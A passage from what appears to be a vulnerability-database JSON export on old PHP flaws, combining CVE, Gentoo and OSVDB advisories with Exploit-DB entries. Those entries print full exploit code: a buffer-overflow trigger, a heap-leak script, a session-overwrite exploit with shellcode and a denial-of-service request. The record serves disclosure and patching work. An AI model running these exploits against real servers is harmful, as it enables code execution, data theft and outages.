prevent infinite loops.", "modified": "2019-10-09T22:52:00", "id": "CVE-2007-0988", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0988", "published": "2007-02-20T17:28:00", "title": "CVE-2007-0988", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "The Zend Engine in PHP 4.x before 4.4.7, and 5.x before 5.2.2, allows remote attackers to cause a denial of service (stack exhaustion and PHP crash) via deeply nested arrays, which trigger deep recursion in the variable destruction routines.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-1285", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1285", "published": "2007-03-06T20:19:00", "title": "CVE-2007-1285", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:06", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nSeveral vulnerabilities were found in PHP by the Hardened-PHP Project and other researchers. These vulnerabilities include a heap-based buffer overflow in htmlentities() and htmlspecialchars() if called with UTF-8 parameters, and an off-by-one error in str_ireplace(). Other vulnerabilities were also found in the PHP4 branch, including possible overflows, stack corruptions and a format string vulnerability in the *print() functions on 64 bit systems. \n\n### Impact\n\nRemote attackers might be able to exploit these issues in PHP applications making use of the affected functions, potentially resulting in the execution of arbitrary code, Denial of Service, execution of scripted contents in the context of the affected site, security bypass or information leak. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"dev-lang/php\"", "modified": "2008-03-29T00:00:00", "published": "2007-03-20T00:00:00", "id": "GLSA-200703-21", "href": "https://security.gentoo.org/glsa/200703-21", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T11:10:17", "bulletinFamily": "exploit", "description": "PHP 5.1.6 Imap_Mail_Compose() Function Buffer Overflow Vulnerability. CVE-2007-1825. Remote exploit for php platform", "modified": "2007-03-31T00:00:00", "published": "2007-03-31T00:00:00", "id": "EDB-ID:29807", "href": "https://www.exploit-db.com/exploits/29807/", "type": "exploitdb", "title": "PHP <= 5.1.6 Imap_Mail_Compose Function Buffer Overflow Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/23234/info\r\n\r\nPHP is prone to a buffer-overflow vulnerability because the application fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.\r\n\r\nAn attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users.\r\n\r\nThis issue affects PHP versions prior to 4.4.5 and 5.2.1. \r\n\r\n<?php\r\n\r\n$envelope[\"from\"]= \"joe@example.com\";\r\n$envelope[\"to\"] = \"foo@example.com\";\r\n\r\n$part1[\"type\"] = TYPEMULTIPART;\r\n$part1[\"subtype\"] = \"mixed\";\r\n$part1[\"type.parameters\"] = array(\"BOUNDARY\" => str_repeat(\"A\",8192));\r\n\r\n$part2[\"type\"] = TYPETEXT;\r\n$part2[\"subtype\"] = \"plain\";\r\n$part2[\"description\"] = \"description3\";\r\n$part2[\"contents.data\"] = \"contents.data3\\n\\n\\n\\t\";\r\n\r\n$body[1] = $part1;\r\n$body[2] = $part2;\r\n\r\nimap_mail_compose($envelope, $body);\r\n\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29807/"}, {"lastseen": "2016-01-31T18:25:42", "bulletinFamily": "exploit", "description": "PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak. CVE-2007-1380. Local exploits for multiple platform", "modified": "2007-03-04T00:00:00", "published": "2007-03-04T00:00:00", "id": "EDB-ID:3413", "href": "https://www.exploit-db.com/exploits/3413/", "type": "exploitdb", "title": "PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP php_binary Session Deserialization Information Leak //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n\n ini_set(\"session.serialize_handler\", \"php_binary\");\n \n session_start();\n $x = chr(36).str_repeat(\"A\", 36).\"N;\".chr(127);\n $data = $x;\n \n session_decode($data); \n\n $keys = array_keys($_SESSION);\n $heapdump = $keys[1];\n \n echo \"Heapdump\\n---------\\n\\n\";\n \n $len = strlen($heapdump);\n for ($b=0; $b<$len; $b+=16) {\n printf(\"%08x: \", $b);\n for ($i=0; $i<16; $i++) {\n if ($b+$i<$len) {\n printf (\"%02x \", ord($heapdump[$b+$i]));\n } else {\n printf (\".. \");\n }\n }\n for ($i=0; $i<16; $i++) {\n if ($b+$i<$len) {\n $c = ord($heapdump[$b+$i]);\n } else {\n $c = 0;\n }\n if ($c > 127 || $c < 32) {\n $c = ord(\".\");\n }\n printf (\"%c\", $c);\n }\n printf(\"\\n\");\n }\n?>\n\n# milw0rm.com [2007-03-04]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3413/"}, {"lastseen": "2016-01-31T18:48:38", "bulletinFamily": "exploit", "description": "PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit. CVE-2007-1701. Local exploit for linux platform", "modified": "2007-03-25T00:00:00", "published": "2007-03-25T00:00:00", "id": "EDB-ID:3572", "href": "https://www.exploit-db.com/exploits/3572/", "type": "exploitdb", "title": "PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP session_decode() _SESSION Overwrite Vulnerability //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n\n $shellcode = \"\\x29\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x46\".\n \"\\x32\\x3c\\xe5\\x83\\xeb\\xfc\\xe2\\xf4\\x77\\xe9\\x6f\\xa6\\x15\\x58\\x3e\\x8f\".\n \"\\x20\\x6a\\xa5\\x6c\\xa7\\xff\\xbc\\x73\\x05\\x60\\x5a\\x8d\\x57\\x6e\\x5a\\xb6\".\n \"\\xcf\\xd3\\x56\\x83\\x1e\\x62\\x6d\\xb3\\xcf\\xd3\\xf1\\x65\\xf6\\x54\\xed\\x06\".\n \"\\x8b\\xb2\\x6e\\xb7\\x10\\x71\\xb5\\x04\\xf6\\x54\\xf1\\x65\\xd5\\x58\\x3e\\xbc\".\n \"\\xf6\\x0d\\xf1\\x65\\x0f\\x4b\\xc5\\x55\\x4d\\x60\\x54\\xca\\x69\\x41\\x54\\x8d\".\n \"\\x69\\x50\\x55\\x8b\\xcf\\xd1\\x6e\\xb6\\xcf\\xd3\\xf1\\x65\".\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n findOffsets();\n\n\n\n $Hashtable = pack(\"LLLLLLLLLCCC\", 2, 1, 0, 0, 0, $offset_1+0x70, 0, $offset_1+0x70, $offset_1, 0, 0, 0);\n\n $str = '_SESSION|s:39:\"'.$Hashtable.'\"|a|i:0;a|i:0;';\n \n session_start();\n session_decode($str);\n\n\n\n\n\n\n\n // This function uses the substr_compare() vulnerability\n // to get the offsets. \n \n function findOffsets()\n {\n global $offset_1, $offset_2, $shellcode;\n // We need to NOT clear these variables,\n // otherwise the heap is too segmented\n global $memdump, $d, $arr;\n \n $sizeofHashtable = 39;\n $maxlong = 0x7fffffff;\n\n // Signature of a big endian Hashtable of size 256 with 1 element\n $search = \"\\x00\\x01\\x00\\x00\\xff\\x00\\x00\\x00\\x01\\x00\\x00\\x00\";\n\n $memdump = str_repeat(\"A\", 4096);\n for ($i=0; $i<400; $i++) {\n\t $d[$i]=array();\n }\n unset($d[350]);\n $x = str_repeat(\"\\x01\", $sizeofHashtable);\n unset($d[351]);\n unset($d[352]);\n $arr = array();\n for ($i=0; $i<129; $i++) { $arr[$i] = 1; }\n $arr[$shellcode] = 1;\n for ($i=0; $i<129; $i++) { unset($arr[$i]); }\n\n // If the libc memcmp leaks the information use it\n // otherwise we only get a case insensitive memdump\n $b = substr_compare(chr(65),chr(0),0,1,false) != 65;\n\n for ($i=0; $i<4096; $i++) {\n $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);\n $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\n if ($y-$Y == 1 || $Y-$y==1){\n $y = chr($y);\n if ($b && strtoupper($y)!=$y) {\n if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {\n $y = strtoupper($y);\n }\n }\n $memdump[$i] = $y;\n } else {\n \t $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\n $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);\n if ($y-$Y != 1 && $Y-$y!=1){\n\t $memdump[$i] = chr(1);\n } else {\n $memdump[$i] = chr(0);\n } \n }\n }\n \n // Search shellcode and hashtable and calculate memory address\n $pos_shellcode = strpos($memdump, $shellcode);\n $pos_hashtable = strpos($memdump, $search);\n $addr = substr($memdump, $pos_hashtable+6*4, 4);\n $addr = unpack(\"L\", $addr);\n \n // Fill in both offsets \n $offset_1 = $addr[1] + 32;\n $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;\n }\n\n?>\n\n# milw0rm.com [2007-03-25]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3572/"}, {"lastseen": "2016-02-03T10:55:25", "bulletinFamily": "exploit", "description": "PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability. CVE-2007-1285. Dos exploit for php platform", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "EDB-ID:29692", "href": "https://www.exploit-db.com/exploits/29692/", "type": "exploitdb", "title": "PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/22764/info\r\n\r\nPHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.\r\n\r\nThis issue affects all versions of PHP. \r\n\r\n$ php -r 'echo \"a\".str_repeat(\"[]\",200000).\"=1&a=0\";' > postdata\r\n\r\n$ curl http://www.example.com/ -d @postdata\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29692/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the imap_mail_compose function not properly sanitizing user-supplied input to the type.parameters field. By supplying an overly long boundary string, an attacker can trigger a buffer overflow and potentially execute arbitrary code.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the imap_mail_compose function not properly sanitizing user-supplied input to the type.parameters field. By supplying an overly long boundary string, an attacker can trigger a buffer overflow and potentially execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-40-2007.html\n[CVE-2007-1825](https://vulners.com/cve/CVE-2007-1825)\nBugtraq ID: 23234\n", "modified": "2007-03-31T16:53:48", "published": "2007-03-31T16:53:48", "href": "https://vulners.com/osvdb/OSVDB:33957", "id": "OSVDB:33957", "title": "PHP imap_mail_compose() Function Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to gain access to privileged information. The issue is due to the WDDX deserializer in the wddx extension not properly initializing the key_length variable for numerical keys. This may allow an attacker to read arbitrary parts of the stack memory via a crafted wddxPacket alement.\n## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a context-dependent attacker to gain access to privileged information. The issue is due to the WDDX deserializer in the wddx extension not properly initializing the key_length variable for numerical keys. This may allow an attacker to read arbitrary parts of the stack memory via a crafted wddxPacket alement.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-11-2007.html\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\nGeneric Exploit URL: http://www.php-security.org/MOPB/code/MOPB-11-2007.php\n[CVE-2007-0908](https://vulners.com/cve/CVE-2007-0908)\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:32766", "id": "OSVDB:32766", "title": "PHP wddx Extension Unspecified Information Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0909](https://vulners.com/cve/CVE-2007-0909)\nBugtraq ID: 22496\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:32765", "id": "OSVDB:32765", "title": "PHP odbc_result_all Function Format String", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0907](https://vulners.com/cve/CVE-2007-0907)\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:32767", "id": "OSVDB:32767", "title": "PHP sapi_header_op Function Underflow DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: 